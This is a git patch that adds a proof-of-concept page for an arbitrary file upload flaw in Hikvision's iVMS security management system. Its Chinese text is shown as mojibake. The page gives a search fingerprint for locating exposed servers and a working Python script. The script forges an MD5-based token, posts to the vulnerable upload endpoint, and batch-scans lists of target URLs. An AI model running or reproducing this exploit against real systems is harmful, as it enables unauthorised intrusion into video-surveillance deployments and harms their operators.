From 7beb7b9037f2eef89d484474102e9fff32a2a2e0 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 9 Mar 2024 15:14:14 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=B7=E5=BA=B7=E5=A8=81=E8=A7=86iV?= =?UTF-8?q?MS=E7=BB=BC=E5=90=88=E5=AE=89=E9=98=B2=E7=B3=BB=E7=BB=9Fresourc?= =?UTF-8?q?eOperations=E6=8E=A5=E5=8F=A3=E4=BB=BB=E6=84=8F=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„文件上传æ¼æ´ž.md | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 海康å¨è§†iVMS综åˆå®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„文件上传æ¼æ´ž.md diff --git a/海康å¨è§†iVMS综åˆå®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„文件上传æ¼æ´ž.md b/海康å¨è§†iVMS综åˆå®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„文件上传æ¼æ´ž.md new file mode 100644 index 0000000..8293a68 --- /dev/null +++ b/海康å¨è§†iVMS综åˆå®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„文件上传æ¼æ´ž.md @@ -0,0 +1,72 @@ +## 海康å¨è§†iVMS综åˆå®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„文件上传æ¼æ´ž + +## 鹰图指纹 +``` +web.body="/views/home/file/installPackage.rar" +``` +![33552763e8f0dc7bf3ee49698486a07d](https://github.com/wy876/POC/assets/139549762/9b75816d-eead-4aef-9411-6cd9ecec938f) + +## poc +```python + +import requests +import urllib3 +import urllib +import hashlib +import argparse +from colorama import init +from colorama import Fore +init(autoreset=True) +urllib3.disable_warnings() + + +head = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36", + "Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169" +} +def md5encode(url): + if url.endswith("/"): + path = "eps/api/resourceOperations/uploadsecretKeyIbuilding" + else: + path = "/eps/api/resourceOperations/uploadsecretKeyIbuilding" + encodetext = url + path + input_name = hashlib.md5() + input_name.update(encodetext.encode("utf-8")) + return (input_name.hexdigest()).upper() + +def poc(url): + if url.endswith("/"): + path = "eps/api/resourceOperations/upload?token=" + else: + path = "/eps/api/resourceOperations/upload?token=" + pocurl = url + path + md5encode(url) + data = { + "service": urllib.parse.quote(url + "/home/index.action") + } + try: + response = requests.post(url=pocurl,headers=head,data=data,verify=False,timeout=3) + if response.status_code==200: + print(Fore.GREEN + f"[+]{url}存在海康å¨è§†iVMS 综åˆå®‰é˜²ä»»æ„文件上传æ¼æ´žï¼ï¼ï¼ï¼") + else: + print(Fore.RED + f"[-]{url}ä¸å­˜åœ¨æµ·åº·å¨è§†iVMS 综åˆå®‰é˜²ä»»æ„文件上传æ¼æ´ž") + except: + pass + +if __name__ == '__main__': + parser = argparse.ArgumentParser(usage='python3 ivms.py -u http://xxxx\npython3 ivms.py -f file.txt', + description='ivmsæ¼æ´žæ£€æµ‹poc', + ) + p = parser.add_argument_group('ivms çš„å‚æ•°') + p.add_argument("-u", "--url", type=str, help="测试å•æ¡url") + p.add_argument("-f", "--file", type=str, help="测试多个url文件") + args = parser.parse_args() + if args.url: + poc(args.url) + if args.file: + for i in open(args.file,"r").read().split("\n"): + poc(i) +``` +![7561a68dd370ef377060f8b033db4842](https://github.com/wy876/POC/assets/139549762/bf160518-070d-4953-ab47-15c5f7786b12) + +## æ¼æ´žæ¥æº +- https://mp.weixin.qq.com/s/W9cLutTOXjmplVKzEKH9Zg